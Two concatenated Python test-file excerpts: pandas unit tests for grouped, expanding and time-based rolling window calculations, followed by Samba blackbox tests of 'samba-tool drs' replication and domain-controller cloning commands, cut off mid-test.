tm.assert_frame_equal(result, expected)
for f in ['std', 'var']:
result = getattr(r, f)(ddof=1)
expected = g.apply(lambda x: getattr(x.rolling(4), f)(ddof=1))
tm.assert_frame_equal(result, expected)
result = r.quantile(0.5)
expected = g.apply(lambda x: x.rolling(4).quantile(0.5))
tm.assert_frame_equal(result, expected)
def test_rolling_corr_cov(self):
g = self.frame.groupby('A')
r = g.rolling(window=4)
for f in ['corr', 'cov']:
result = getattr(r, f)(self.frame)
def func(x):
return getattr(x.rolling(4), f)(self.frame)
expected = g.apply(func)
tm.assert_frame_equal(result, expected)
result = getattr(r.B, f)(pairwise=True)
def func(x):
return getattr(x.B.rolling(4), f)(pairwise=True)
expected = g.apply(func)
tm.assert_series_equal(result, expected)
def test_rolling_apply(self, raw):
g = self.frame.groupby('A')
r = g.rolling(window=4)
# reduction
result = r.apply(lambda x: x.sum(), raw=raw)
expected = g.apply(
lambda x: x.rolling(4).apply(lambda y: y.sum(), raw=raw))
tm.assert_frame_equal(result, expected)
def test_rolling_apply_mutability(self):
# GH 14013
df = pd.DataFrame({'A': ['foo'] * 3 + ['bar'] * 3, 'B': [1] * 6})
g = df.groupby('A')
mi = pd.MultiIndex.from_tuples([('bar', 3), ('bar', 4), ('bar', 5),
('foo', 0), ('foo', 1), ('foo', 2)])
mi.names = ['A', None]
# Grouped column should not be a part of the output
expected = pd.DataFrame([np.nan, 2., 2.] * 2, columns=['B'], index=mi)
result = g.rolling(window=2).sum()
tm.assert_frame_equal(result, expected)
# Call an arbitrary function on the groupby
g.sum()
# Make sure nothing has been mutated
result = g.rolling(window=2).sum()
tm.assert_frame_equal(result, expected)
def test_expanding(self):
g = self.frame.groupby('A')
r = g.expanding()
for f in ['sum', 'mean', 'min', 'max', 'count', 'kurt', 'skew']:
result = getattr(r, f)()
expected = g.apply(lambda x: getattr(x.expanding(), f)())
tm.assert_frame_equal(result, expected)
for f in ['std', 'var']:
result = getattr(r, f)(ddof=0)
expected = g.apply(lambda x: getattr(x.expanding(), f)(ddof=0))
tm.assert_frame_equal(result, expected)
result = r.quantile(0.5)
expected = g.apply(lambda x: x.expanding().quantile(0.5))
tm.assert_frame_equal(result, expected)
def test_expanding_corr_cov(self):
g = self.frame.groupby('A')
r = g.expanding()
for f in ['corr', 'cov']:
result = getattr(r, f)(self.frame)
def func(x):
return getattr(x.expanding(), f)(self.frame)
expected = g.apply(func)
tm.assert_frame_equal(result, expected)
result = getattr(r.B, f)(pairwise=True)
def func(x):
return getattr(x.B.expanding(), f)(pairwise=True)
expected = g.apply(func)
tm.assert_series_equal(result, expected)
def test_expanding_apply(self, raw):
g = self.frame.groupby('A')
r = g.expanding()
# reduction
result = r.apply(lambda x: x.sum(), raw=raw)
expected = g.apply(
lambda x: x.expanding().apply(lambda y: y.sum(), raw=raw))
tm.assert_frame_equal(result, expected)
class TestRollingTS(object):
# rolling time-series friendly
# xref GH13327
def setup_method(self, method):
self.regular = DataFrame({'A': pd.date_range('20130101',
periods=5,
freq='s'),
'B': range(5)}).set_index('A')
self.ragged = DataFrame({'B': range(5)})
self.ragged.index = [Timestamp('20130101 09:00:00'),
Timestamp('20130101 09:00:02'),
Timestamp('20130101 09:00:03'),
Timestamp('20130101 09:00:05'),
Timestamp('20130101 09:00:06')]
def test_doc_string(self):
df = DataFrame({'B': [0, 1, 2, np.nan, 4]},
index=[Timestamp('20130101 09:00:00'),
Timestamp('20130101 09:00:02'),
Timestamp('20130101 09:00:03'),
Timestamp('20130101 09:00:05'),
Timestamp('20130101 09:00:06')])
df
df.rolling('2s').sum()
def test_valid(self):
df = self.regular
# not a valid freq
with pytest.raises(ValueError):
df.rolling(window='foobar')
# not a datetimelike index
with pytest.raises(ValueError):
df.reset_index().rolling(window='foobar')
# non-fixed freqs
for freq in ['2MS', pd.offsets.MonthBegin(2)]:
with pytest.raises(ValueError):
df.rolling(window=freq)
for freq in ['1D', pd.offsets.Day(2), '2ms']:
df.rolling(window=freq)
# non-integer min_periods
for minp in [1.0, 'foo', np.array([1, 2, 3])]:
with pytest.raises(ValueError):
df.rolling(window='1D', min_periods=minp)
# center is not implemented
with pytest.raises(NotImplementedError):
df.rolling(window='1D', center=True)
def test_on(self):
df = self.regular
# not a valid column
with pytest.raises(ValueError):
df.rolling(window='2s', on='foobar')
# column is valid
df = df.copy()
df['C'] = pd.date_range('20130101', periods=len(df))
df.rolling(window='2d', on='C').sum()
# invalid columns
with pytest.raises(ValueError):
df.rolling(window='2d', on='B')
# ok even though on non-selected
df.rolling(window='2d', on='C').B.sum()
def test_monotonic_on(self):
# on/index must be monotonic
df = DataFrame({'A': pd.date_range('20130101',
periods=5,
freq='s'),
'B': range(5)})
assert df.A.is_monotonic
df.rolling('2s', on='A').sum()
df = df.set_index('A')
assert df.index.is_monotonic
df.rolling('2s').sum()
# non-monotonic
df.index = reversed(df.index.tolist())
assert not df.index.is_monotonic
with pytest.raises(ValueError):
df.rolling('2s').sum()
df = df.reset_index()
with pytest.raises(ValueError):
df.rolling('2s', on='A').sum()
def test_frame_on(self):
df = DataFrame({'B': range(5),
'C': pd.date_range('20130101 09:00:00',
periods=5,
freq='3s')})
df['A'] = [Timestamp('20130101 09:00:00'),
Timestamp('20130101 09:00:02'),
Timestamp('20130101 09:00:03'),
Timestamp('20130101 09:00:05'),
Timestamp('20130101 09:00:06')]
# we are doing simulating using 'on'
expected = (df.set_index('A')
.rolling('2s')
.B
.sum()
.reset_index(drop=True)
)
result = (df.rolling('2s', on='A')
.B
.sum()
)
tm.assert_series_equal(result, expected)
# test as a frame
# we should be ignoring the 'on' as an aggregation column
# note that the expected is setting, computing, and resetting
# so the columns need to be switched compared
# to the actual result where they are ordered as in the
# original
expected = (df.set_index('A')
.rolling('2s')[['B']]
.sum()
.reset_index()[['B', 'A']]
)
result = (df.rolling('2s', on='A')[['B']]
.sum()
)
tm.assert_frame_equal(result, expected)
def test_frame_on2(self):
# using multiple aggregation columns
df = DataFrame({'A': [0, 1, 2, 3, 4],
'B': [0, 1, 2, np.nan, 4],
'C': Index([Timestamp('20130101 09:00:00'),
Timestamp('20130101 09:00:02'),
Timestamp('20130101 09:00:03'),
Timestamp('20130101 09:00:05'),
Timestamp('20130101 09:00:06')])},
columns=['A', 'C', 'B'])
expected1 = DataFrame({'A': [0., 1, 3, 3, 7],
'B': [0, 1, 3, np.nan, 4],
'C': df['C']},
columns=['A', 'C', 'B'])
result = df.rolling('2s', on='C').sum()
expected = expected1
tm.assert_frame_equal(result, expected)
expected = Series([0, 1, 3, np.nan, 4], name='B')
result = df.rolling('2s', on='C').B.sum()
tm.assert_series_equal(result, expected)
expected = expected1[['A', 'B', 'C']]
result = df.rolling('2s', on='C')[['A', 'B', 'C']].sum()
tm.assert_frame_equal(result, expected)
def test_basic_regular(self):
df = self.regular.copy()
df.index = pd.date_range('20130101', periods=5, freq='D')
expected = df.rolling(window=1, min_periods=1).sum()
result = df.rolling(window='1D').sum()
tm.assert_frame_equal(result, expected)
df.index = pd.date_range('20130101', periods=5, freq='2D')
expected = df.rolling(window=1, min_periods=1).sum()
result = df.rolling(window='2D', min_periods=1).sum()
tm.assert_frame_equal(result, expected)
expected = df.rolling(window=1, min_periods=1).sum()
result = df.rolling(window='2D', min_periods=1).sum()
tm.assert_frame_equal(result, expected)
expected = df.rolling(window=1).sum()
result = df.rolling(window='2D').sum()
tm.assert_frame_equal(result, expected)
def test_min_periods(self):
# compare for min_periods
df = self.regular
# these slightly different
expected = df.rolling(2, min_periods=1).sum()
result = df.rolling('2s').sum()
tm.assert_frame_equal(result, expected)
expected = df.rolling(2, min_periods=1).sum()
result = df.rolling('2s', min_periods=1).sum()
tm.assert_frame_equal(result, expected)
def test_closed(self):
# xref GH13965
df = DataFrame({'A': [1] * 5},
index=[Timestamp('20130101 09:00:01'),
Timestamp('20130101 09:00:02'),
Timestamp('20130101 09:00:03'),
Timestamp('20130101 09:00:04'),
Timestamp('20130101 09:00:06')])
# closed must be 'right', 'left', 'both', 'neither'
with pytest.raises(ValueError):
self.regular.rolling(window='2s', closed="blabla")
expected = df.copy()
expected["A"] = [1.0, 2, 2, 2, 1]
result = df.rolling('2s', closed='right').sum()
tm.assert_frame_equal(result, expected)
# default should be 'right'
result = df.rolling('2s').sum()
tm.assert_frame_equal(result, expected)
expected = df.copy()
expected["A"] = [1.0, 2, 3, 3, 2]
result = df.rolling('2s', closed='both').sum()
tm.assert_frame_equal(result, expected)
expected = df.copy()
expected["A"] = [np.nan, 1.0, 2, 2, 1]
result = df.rolling('2s', closed='left').sum()
tm.assert_frame_equal(result, expected)
expected = df.copy()
expected["A"] = [np.nan, 1.0, 1, 1, np.nan]
result = df.rolling('2s', closed='neither').sum()
tm.assert_frame_equal(result, expected)
def test_ragged_sum(self):
df = self.ragged
result = df.rolling(window='1s', min_periods=1).sum()
expected = df.copy()
expected['B'] = [0.0, 1, 2, 3, 4]
tm.assert_frame_equal(result, expected)
result = df.rolling(window='2s', min_periods=1).sum()
expected = df.copy()
expected['B'] = [0.0, 1, 3, 3, 7]
tm.assert_frame_equal(result, expected)
result = df.rolling(window='2s', min_periods=2).sum()
expected = df.copy()
expected['B'] = [np.nan, np.nan, 3, np.nan, 7]
tm.assert_frame_equal(result, expected)
result = df.rolling(window='3s', min_periods=1).sum()
expected = df.copy()
expected['B'] = [0.0, 1, 3, 5, 7]
tm.assert_frame_equal(result, expected)
result = df.rolling(window='3s').sum()
expected = df.copy()
expected['B'] = [0.0, 1, 3, 5, 7]
tm.assert_frame_equal(result, expected)
result = df.rolling(window='4s', min_periods=1).sum()
expected = df.copy()
expected['B'] = [0.0, 1, 3, 6, 9]
tm.assert_frame_equal(result, expected)
result = df.rolling(window='4s', min_periods=3).sum()
expected = df.copy()
expected['B'] = [np.nan, np.nan, 3, 6, 9]
tm.assert_frame_equal(result, expected)
result = df.rolling(window='5s', min_periods=1).sum()
expected = df.copy()
expected['B'] = [0.0, 1, 3, 6, 10]
tm.assert_frame_equal(result, expected)
def test_ragged_mean(self):
df = self.ragged
result = df.rolling(window='1s', min_periods=1).mean()
expected = df.copy()
expected['B'] = [0.0, 1, 2, 3, 4]
tm.assert_frame_equal(result, expected)
result = df.rolling(window='2s', min_periods=1).mean()
expected = df.copy()
expected['B'] = [0.0, 1, 1.5, 3.0, 3.5]
tm.assert_frame_equal(result, expected)
def test_ragged_median(self):
df = self.ragged
result = df.rolling(window='1s', min_periods=1).median()
expected = df.copy()
expected['B'] = [0.0, 1, 2, 3, 4]
tm.assert_frame_equal(result, expected)
result = df.rolling(window='2s', min_periods=1).median()
expected = df.copy()
expected['B'] = [0.0, 1, 1.5, 3.0, 3.5]
tm.assert_frame_equal(result, expected)
def test_ragged_quantile(self):
df = self.ragged
result = df.rolling(window='1s', min_periods=1).quantile(0.5)
expected = df.copy()
expected['B'] = [0.0, 1, 2, 3, 4]
tm.assert_frame_equal(result, expected)
result = df.rolling(window='2s', min_periods=1).quantile(0.5)
expected = df.copy()
expected['B'] = [0.0, 1, 1.5, 3.0, 3.5]
tm.assert_frame_equal(result, expected)
def test_ragged_std(self):
df = self.ragged
result = df.rolling(window='1s', min_periods=1).std(ddof=0)
expected = df.copy()
expected['B'] = [0.0] * 5
tm.assert_frame_equal(result, expected)
result = df.rolling(window='1s', min_periods=1).std(ddof=1)
expected = df.copy()
expected['B'] = [np.nan] * 5
tm.assert_frame_equal(result, expected)
result = df.rolling(window='3s', min_periods=1).std(ddof=0)
expected = df.copy()
expected['B'] = [0.0] + [0.5] * 4
tm.assert_frame_equal(result, expected)
result = df.rolling(window='5s', min_periods=1).std(ddof=1)
expected = df.copy()
expected['B'] = [np.nan, 0.707107, 1.0, 1.0, 1.290994]
tm.assert_frame_equal(result, expected)
def test_ragged_var(self):
df = self.ragged
result = df.rolling(window='1s', min_periods=1).var(ddof=0)
expected = df.copy()
expected['B'] = [0.0] * 5
tm.assert_frame_equal(result, expected)
result = df.rolling(window='1s', min_periods=1).var(ddof=1)
expected = df.copy()
expected['B'] = [np.nan] * 5
tm.assert_frame_equal(result, expected)
result = df.rolling(window='3s', min_periods=1).var(ddof=0)
expected = df.copy()
expected['B'] = [0.0] + [0.25] * 4
tm.assert_frame_equal(result, expected)
result = df.rolling(window='5s', min_periods=1).var(ddof=1)
expected = df.copy()
expected['B'] = [np.nan, 0.5, 1.0, 1.0, 1 + 2 / 3.]
tm.assert_frame_equal(result, expected)
def test_ragged_skew(self):
df = self.ragged
result = df.rolling(window='3s', min_periods=1).skew()
expected = df.copy()
expected['B'] = [np.nan] * 5
tm.assert_frame_equal(result, expected)
result = df.rolling(window='5s', min_periods=1).skew()
expected = df.copy()
expected['B'] = [np.nan] * 2 + [0.0, 0.0, 0.0]
tm.assert_frame_equal(result, expected)
def test_ragged_kurt(self):
df = self.ragged
result = df.rolling(window='3s', min_periods=1).kurt()
expected = df.copy()
expected['B'] = [np.nan] * 5
tm.assert_frame_equal(result, expected)
result = df.rolling(window='5s', min_periods=1).kurt()
expected = df.copy()
expected['B'] = [np.nan] * 4 + [-1.2]
tm.assert_frame_equal(result, expected)
def test_ragged_count(self):
df = self.ragged
result = df.rolling(window='1s', min_periods=1).count()
expected = df.copy()
expected['B'] = [1.0, 1, 1, 1, 1]
tm.assert_frame_equal(result, expected)
df = self.ragged
result = df.rolling(window='1s').count()
tm.assert_frame_equal(result, expected)
result = df.rolling(window='2s', min_periods=1).count()
expected = df.copy()
expected['B'] = [1.0, 1, 2, 1, 2]
tm.assert_frame_equal(result, expected)
result = df.rolling(window='2s', min_periods=2).count()
expected = df.copy()
expected['B'] = [np.nan, np.nan, 2, np.nan, 2]
tm.assert_frame_equal(result, expected)
def test_regular_min(self):
df = DataFrame({'A': pd.date_range('20130101',
periods=5,
freq='s'),
'B': [0.0, 1, 2, 3, 4]}).set_index('A')
result = df.rolling('1s').min()
expected = df.copy()
expected['B'] = [0.0, 1, 2, 3, 4]
tm.assert_frame_equal(result, expected)
df = DataFrame({'A': pd.date_range('20130101',
periods=5,
freq='s'),
'B': [5, 4, 3, 4, 5]}).set_index('A')
tm.assert_frame_equal(result, expected)
result = df.rolling('2s').min()
expected = df.copy()
expected['B'] = [5.0, 4, 3, 3, 4]
tm.assert_frame_equal(result, expected)
result = df.rolling('5s').min()
expected = df.copy()
expected['B'] = [5.0, 4, 3, 3, 3]
tm.assert_frame_equal(result, expected)
def test_ragged_min(self):
df = self.ragged
result = df.rolling(window='1s', min_periods=1).min()
expected = df.copy()
expected['B'] = [0.0, 1, 2, 3, 4]
tm.assert_frame_equal(result, expected)
result = df.rolling(window='2s', min_periods=1).min()
expected = df.copy()
expected['B'] = [0.0, 1, 1, 3, 3]
tm.assert_frame_equal(result, expected)
result = df.rolling(window='5s', min_periods=1).min()
expected = df.copy()
expected['B'] = [0.0, 0, 0, 1, 1]
tm.assert_frame_equal(result, expected)
def test_perf_min(self):
N = 10000
dfp = DataFrame({'B': np.random.randn(N)},
index=pd.date_range('20130101',
periods=N,
freq='s'))
expected = dfp.rolling(2, min_periods=1).min()
result = dfp.rolling('2s').min()
assert ((result - expected) < 0.01).all().bool()
expected = dfp.rolling(200, min_periods=1).min()
result = dfp.rolling('200s').min()
assert ((result - expected) < 0.01).all().bool()
def test_ragged_max(self):
df = self.ragged
result = df.rolling(window='1s', min_periods=1).max()
expected = df.copy()
expected['B'] = [0.0, 1, 2, 3, 4]
tm.assert_frame_equal(result, expected)
result = df.rolling(window='2s', min_periods=1).max()
expected = df.copy()
expected['B'] = [0.0, 1, 2, 3, 4]
tm.assert_frame_equal(result, expected)
result = df.rolling(window='5s', min_periods=1).max()
expected = df.copy()
expected['B'] = [0.0, 1, 2, 3, 4]
tm.assert_frame_equal(result, expected)
def test_ragged_apply(self, raw):
df = self.ragged
f = lambda x: 1
result = df.rolling(window='1s', min_periods=1).apply(f, raw=raw)
expected = df.copy()
expected['B'] = 1.
tm.assert_frame_equal(result, expected)
result = df.rolling(window='2s', min_periods=1).apply(f, raw=raw)
expected = df.copy()
expected['B'] = 1.
tm.assert_frame_equal(result, expected)
result = df.rolling(window='5s', min_periods=1).apply(f, raw=raw)
expected = df.copy()
expected['B'] = 1.
tm.assert_frame_equal(result, expected)
def test_all(self):
# simple comparison of integer vs time-based windowing
df = self.regular * 2
er = df.rolling(window=1)
r = df.rolling(window='1s')
for f in ['sum', 'mean', 'count', 'median', 'std',
'var', 'kurt', 'skew', 'min', 'max']:
result = getattr(r, f)()
expected = getattr(er, f)()
tm.assert_frame_equal(result, expected)
result = r.quantile(0.5)
expected = er.quantile(0.5)
tm.assert_frame_equal(result, expected)
def test_all_apply(self, raw):
df = self.regular * 2
er = df.rolling(window=1)
r = df.rolling(window='1s')
result = r.apply(lambda x: 1, raw=raw)
expected = er.apply(lambda x: 1, raw=raw)
tm.assert_frame_equal(result, expected)
def test_all2(self):
# more sophisticated comparison of integer vs.
# time-based windowing
df = DataFrame({'B': np.arange(50)},
index=pd.date_range('20130101',
periods=50, freq='H')
)
# in-range data
dft = df.between_time("09:00", "16:00")
r = dft.rolling(window='5H')
for f in ['sum', 'mean', 'count', 'median', 'std',
'var', 'kurt', 'skew', 'min', 'max']:
result = getattr(r, f)()
# we need to roll the days separately
# to compare with a time-based roll
# finally groupby-apply will return a multi-index
# so we need to drop the day
def agg_by_day(x):
x = x.between_time("09:00", "16:00")
return getattr(x.rolling(5, min_periods=1), f)()
expected = df.groupby(df.index.day).apply(
agg_by_day).reset_index(level=0, drop=True)
tm.assert_frame_equal(result, expected)
def test_groupby_monotonic(self):
# GH 15130
# we don't need to validate monotonicity when grouping
data = [
['David', '1/1/2015', 100], ['David', '1/5/2015', 500],
['David', '5/30/2015', 50], ['David', '7/25/2015', 50],
['Ryan', '1/4/2014', 100], ['Ryan', '1/19/2015', 500],
['Ryan', '3/31/2016', 50], ['Joe', '7/1/2015', 100],
['Joe', '9/9/2015', 500], ['Joe', '10/15/2015', 50]]
df = DataFrame(data=data, columns=['name', 'date', 'amount'])
df['date'] = pd.to_datetime(df['date'])
expected = df.set_index('date').groupby('name').apply(
lambda x: x.rolling('180D')['amount'].sum())
result = df.groupby('name').rolling('180D', on='date')['amount'].sum()
tm.assert_series_equal(result, expected)
def test_non_monotonic(self):
# GH 13966 (similar to #15130, closed by #15175)
dates = pd.date_range(start='2016-01-01 09:30:00',
periods=20, freq='s')
df = DataFrame({'A': [1] * 20 + [2] * 12 + [3] * 8,
'B': np.concatenate((dates, dates)),
'C': np.arange(40)})
result = df.groupby('A').rolling('4s', on='B').C.mean()
expected = df.set_index('B').groupby('A').apply(
lambda x: x.rolling('4s')['C'].mean())
tm.assert_series_equal(result, expected)
df2 = df.sort_values('B')
result = df2.groupby('A').rolling('4s', on='B').C.mean()
tm.assert_series_equal(result, expected)
def test_rolling_cov_offset(self):
# GH16058
idx = pd.date_range('2017-01-01', periods=24, freq='1h')
ss = Series(np.arange(len(idx)), index=idx)
result = ss.rolling('2h').cov()
expected = Series([np.nan] + [0.5] * (len(idx) - 1), index=idx)
tm.assert_series_equal(result, expected)
expected2 = ss.rolling(2, min_periods=1).cov()
tm.assert_series_equal(result, expected2)
result = ss.rolling('3h').cov()
expected = Series([np.nan, 0.5] + [1.0] * (len(idx) - 2), index=idx)
tm.assert_series_equal(result, expected)
expected2 = ss.rolling(3, min_periods=1).cov()
tm.assert_series_equal(result, expected2)
|
# Blackbox tests for "samba-tool drs" command
# Copyright (C) Kamen Mazdrashki <[email protected]> 2011
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""Blackbox tests for samba-tool drs."""
import samba.tests
import shutil
import os
import ldb
class SambaToolDrsTests(samba.tests.BlackboxTestCase):
"""Blackbox test case for samba-tool drs."""
def setUp(self):
super(SambaToolDrsTests, self).setUp()
self.dc1 = samba.tests.env_get_var_value("DC1")
self.dc2 = samba.tests.env_get_var_value("DC2")
creds = self.get_credentials()
self.cmdline_creds = "-U%s/%s%%%s" % (creds.get_domain(),
creds.get_username(), creds.get_password())
def _get_rootDSE(self, dc, ldap_only=True):
samdb = samba.tests.connect_samdb(dc, lp=self.get_loadparm(),
credentials=self.get_credentials(),
ldap_only=ldap_only)
return samdb.search(base="", scope=samba.tests.ldb.SCOPE_BASE)[0]
def test_samba_tool_bind(self):
"""Tests 'samba-tool drs bind' command."""
# Output should be like:
# Extensions supported:
# <list-of-supported-extensions>
# Site GUID: <GUID>
# Repl epoch: 0
out = self.check_output("samba-tool drs bind %s %s" % (self.dc1,
self.cmdline_creds))
self.assertTrue("Site GUID:" in out)
self.assertTrue("Repl epoch:" in out)
def test_samba_tool_kcc(self):
"""Tests 'samba-tool drs kcc' command."""
# Output should be like 'Consistency check on <DC> successful.'
out = self.check_output("samba-tool drs kcc %s %s" % (self.dc1,
self.cmdline_creds))
self.assertTrue("Consistency check on" in out)
self.assertTrue("successful" in out)
def test_samba_tool_showrepl(self):
"""Tests 'samba-tool drs showrepl' command.
"""
# Output should be like:
# <site-name>/<domain-name>
# DSA Options: <hex-options>
# DSA object GUID: <DSA-object-GUID>
# DSA invocationId: <DSA-invocationId>
# <Inbound-connections-list>
# <Outbound-connections-list>
# <KCC-objects>
# ...
# TODO: Perhaps we should check at least for
# DSA's objectGUDI and invocationId
out = self.check_output("samba-tool drs showrepl %s %s" % (self.dc1,
self.cmdline_creds))
self.assertTrue("DSA Options:" in out)
self.assertTrue("DSA object GUID:" in out)
self.assertTrue("DSA invocationId:" in out)
def test_samba_tool_options(self):
"""Tests 'samba-tool drs options' command
"""
# Output should be like 'Current DSA options: IS_GC <OTHER_FLAGS>'
out = self.check_output("samba-tool drs options %s %s" % (self.dc1,
self.cmdline_creds))
self.assertTrue("Current DSA options:" in out)
def test_samba_tool_replicate(self):
"""Tests 'samba-tool drs replicate' command."""
# Output should be like 'Replicate from <DC-SRC> to <DC-DEST> was successful.'
nc_name = self._get_rootDSE(self.dc1)["defaultNamingContext"]
out = self.check_output("samba-tool drs replicate %s %s %s %s" % (self.dc1,
self.dc2,
nc_name,
self.cmdline_creds))
self.assertTrue("Replicate from" in out)
self.assertTrue("was successful" in out)
def test_samba_tool_replicate_async(self):
"""Tests 'samba-tool drs replicate --async-op' command."""
# Output should be like 'Replicate from <DC-SRC> to <DC-DEST> was started.'
nc_name = self._get_rootDSE(self.dc1)["defaultNamingContext"]
out = self.check_output("samba-tool drs replicate --async-op %s %s %s %s" % (self.dc1,
self.dc2,
nc_name,
self.cmdline_creds))
self.assertTrue("Replicate from" in out)
self.assertTrue("was started" in out)
def test_samba_tool_replicate_local_online(self):
"""Tests 'samba-tool drs replicate --local-online' command."""
# Output should be like 'Replicate from <DC-SRC> to <DC-DEST> was successful.'
nc_name = self._get_rootDSE(self.dc1)["defaultNamingContext"]
out = self.check_output("samba-tool drs replicate --local-online %s %s %s" % (self.dc1,
self.dc2,
nc_name))
self.assertTrue("Replicate from" in out)
self.assertTrue("was successful" in out)
def test_samba_tool_replicate_local_online_async(self):
"""Tests 'samba-tool drs replicate --local-online --async-op' command."""
# Output should be like 'Replicate from <DC-SRC> to <DC-DEST> was started.'
nc_name = self._get_rootDSE(self.dc1)["defaultNamingContext"]
out = self.check_output("samba-tool drs replicate --local-online --async-op %s %s %s" % (self.dc1,
self.dc2,
nc_name))
self.assertTrue("Replicate from" in out)
self.assertTrue("was started" in out)
def test_samba_tool_replicate_local_machine_creds(self):
"""Tests 'samba-tool drs replicate --local -P' command (uses machine creds)."""
# Output should be like 'Replicate from <DC-SRC> to <DC-DEST> was successful.'
nc_name = self._get_rootDSE(self.dc1)["defaultNamingContext"]
out = self.check_output("samba-tool drs replicate -P --local %s %s %s" % (self.dc1,
self.dc2,
nc_name))
self.assertTrue("Replicate from" in out)
self.assertTrue("was successful" in out)
def test_samba_tool_replicate_local(self):
"""Tests 'samba-tool drs replicate --local' command (uses machine creds)."""
# Output should be like 'Replicate from <DC-SRC> to <DC-DEST> was successful.'
nc_name = self._get_rootDSE(self.dc1)["defaultNamingContext"]
out = self.check_output("samba-tool drs replicate --local %s %s %s %s" % (self.dc1,
self.dc2,
nc_name,
self.cmdline_creds))
self.assertTrue("Replicate from" in out)
self.assertTrue("was successful" in out)
def test_samba_tool_replicate_machine_creds_P(self):
"""Tests 'samba-tool drs replicate -P' command with machine creds."""
# Output should be like 'Replicate from <DC-SRC> to <DC-DEST> was successful.'
nc_name = self._get_rootDSE(self.dc1)["defaultNamingContext"]
out = self.check_output("samba-tool drs replicate -P %s %s %s" % (self.dc1,
self.dc2,
nc_name))
self.assertTrue("Replicate from" in out)
self.assertTrue("was successful" in out)
def test_samba_tool_replicate_machine_creds(self):
"""Tests 'samba-tool drs replicate' command with implicit machine creds."""
# Output should be like 'Replicate from <DC-SRC> to <DC-DEST> was successful.'
nc_name = self._get_rootDSE(self.dc1)["defaultNamingContext"]
out = self.check_output("samba-tool drs replicate %s %s %s" % (self.dc1,
self.dc2,
nc_name))
self.assertTrue("Replicate from" in out)
self.assertTrue("was successful" in out)
def test_samba_tool_drs_clone_dc(self):
"""Tests 'samba-tool drs clone-dc-database' command."""
server_rootdse = self._get_rootDSE(self.dc1)
server_nc_name = server_rootdse["defaultNamingContext"]
server_ds_name = server_rootdse["dsServiceName"]
server_ldap_service_name = str(server_rootdse["ldapServiceName"][0])
server_realm = server_ldap_service_name.split(":")[0]
creds = self.get_credentials()
out = self.check_output("samba-tool drs clone-dc-database %s --server=%s %s --targetdir=%s"
% (server_realm,
self.dc1,
self.cmdline_creds,
self.tempdir))
ldb_rootdse = self._get_rootDSE("tdb://" + os.path.join(self.tempdir, "private", "sam.ldb"), ldap_only=False)
nc_name = ldb_rootdse["defaultNamingContext"]
ds_name = ldb_rootdse["dsServiceName"]
ldap_service_name = str(server_rootdse["ldapServiceName"][0])
self.assertEqual(nc_name, server_nc_name)
# The clone should pretend to be the source server
self.assertEqual(ds_name, server_ds_name)
self.assertEqual(ldap_service_name, server_ldap_service_name)
samdb = samba.tests.connect_samdb("tdb://" + os.path.join(self.tempdir, "private", "sam.ldb"),
ldap_only=False, lp=self.get_loadparm())
def get_krbtgt_pw():
krbtgt_pw = samdb.searchone("unicodePwd", "cn=krbtgt,CN=users,%s" % nc_name)
self.assertRaises(KeyError, get_krbtgt_pw)
server_dn = samdb.searchone("serverReferenceBL", "cn=%s,ou=domain controllers,%s" % (self.dc2, server_nc_name))
ntds_guid = samdb.searchone("objectGUID", "cn=ntds settings,%s" % server_dn)
res = samdb.search(base=str(server_nc_name),
expression="(&(objectclass=user)(cn=dns-%s))" % (self.dc2),
attrs=[], scope=ldb.SCOPE_SUBTREE)
if len(res) == 1:
dns_obj = res[0]
else:
dns_obj = None
# While we have this cloned, try demoting the other server on the clone, by GUID
out = self.check_output("samba-tool domain demote --remove-other-dead-server=%s -H %s/private/sam.ldb"
% (ntds_guid,
self.tempdir))
# Check some of the objects that should have been removed
def check_machine_obj():
samdb.searchone("CN", "cn=%s,ou=domain controllers,%s" % (self.dc2, server_nc_name))
self.assertRaises(ldb.LdbError, check_machine_obj)
def check_server_obj():
samdb.searchone("CN", server_dn)
self.assertRaises(ldb.LdbError, check_server_obj)
def check_ntds_guid():
samdb.searchone("CN", "<GUID=%s>" % ntds_guid)
self.assertRaises(ldb.LdbError, check_ntds_guid)
if dns_obj is not None:
# Check some of the objects that should have been removed
def check_dns_account_obj():
samdb.search(base=dns_obj.dn, scope=ldb.SCOPE_BASE,
attrs=[])
self.assertRaises(ldb.LdbError, check_dns_account_obj)
shutil.rmtree(os.path.join(self.tempdir, "private"))
shutil.rmtree(os.path.join(self.tempdir, "etc"))
shutil.rmtree(os.path.join(self.tempdir, "msg.lock"))
os.remove(os.path.join(self.tempdir, "names.tdb"))
shutil.rmtree(os.path.join(self.tempdir, "state"))
def test_samba_tool_drs_clone_dc_secrets(self):
"""Tests 'samba-tool drs clone-dc-database --include-secrets' command ."""
server_rootdse = self._get_rootDSE(self.dc1)
server_nc_name = server_rootdse["defaultNamingContext"]
server_ds_name = server_rootdse["dsServiceName"]
server_ldap_service_name = str(server_rootdse["ldapServiceName"][0])
server_realm = server_ldap_service_name.split(":")[0]
creds = self.get_credentials()
out = self.check_output("samba-tool drs clone-dc-database %s --server=%s %s --targetdir=%s --include-secrets"
% (server_realm,
self.dc1,
self.cmdline_creds,
self.tempdir))
ldb_rootdse = self._get_rootDSE("tdb://" + os.path.join(self.tempdir, "private", "sam.ldb"), ldap_only=False)
nc_name = ldb_rootdse["defaultNamingContext"]
config_nc_name = ldb_rootdse["configurationNamingContext"]
ds_name = ldb_rootdse["dsServiceName"]
ldap_service_name = str(server_rootdse["ldapServiceName"][0])
samdb = samba.tests.connect_samdb("tdb://" + os.path.join(self.tempdir, "private", "sam.ldb"),
ldap_only=False, lp=self.get_loadparm())
krbtgt_pw = samdb.searchone("unicodePwd", "cn=krbtgt,CN=users,%s" % nc_name)
self.assertIsNotNone(krbtgt_pw)
self.assertEqual(nc_name, server_nc_name)
# The clone should pretend to be the source server
self.assertEqual(ds_name, server_ds_name)
self.assertEqual(ldap_service_name, server_ldap_service_name)
server_dn = samdb.searchone("serverReferenceBL", "cn=%s,ou=domain controllers,%s" % (self.dc2, server_nc_name))
ntds_guid = samdb.searchone("objectGUID", "cn=ntds settings,%s" % server_dn)
res = samdb.search(base=str(server_nc_name),
